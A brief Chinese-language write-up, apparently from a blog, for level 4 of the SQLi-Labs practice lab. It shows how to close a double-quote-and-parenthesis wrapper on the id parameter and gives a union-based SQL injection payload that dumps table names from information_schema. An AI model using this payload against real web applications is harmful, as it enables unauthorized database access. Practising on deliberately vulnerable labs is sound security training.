1. 程式人生 > >SQLI DUMB SERIES-4

SQLI DUMB SERIES-4

技術分享 分享 其他 concat sqli tab nbsp union ESS

less4

輸入單引號發現回顯正常,說明單引號被過濾了,輸入雙引號:

?id=1"

技術分享圖片

說明輸入的Id被一對雙引號和圓括號包圍,因此閉合雙引號和圓括號就行,其他方法跟less1差不多

例如:union查詢表名

?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%23

技術分享圖片

SQLI DUMB SERIES-4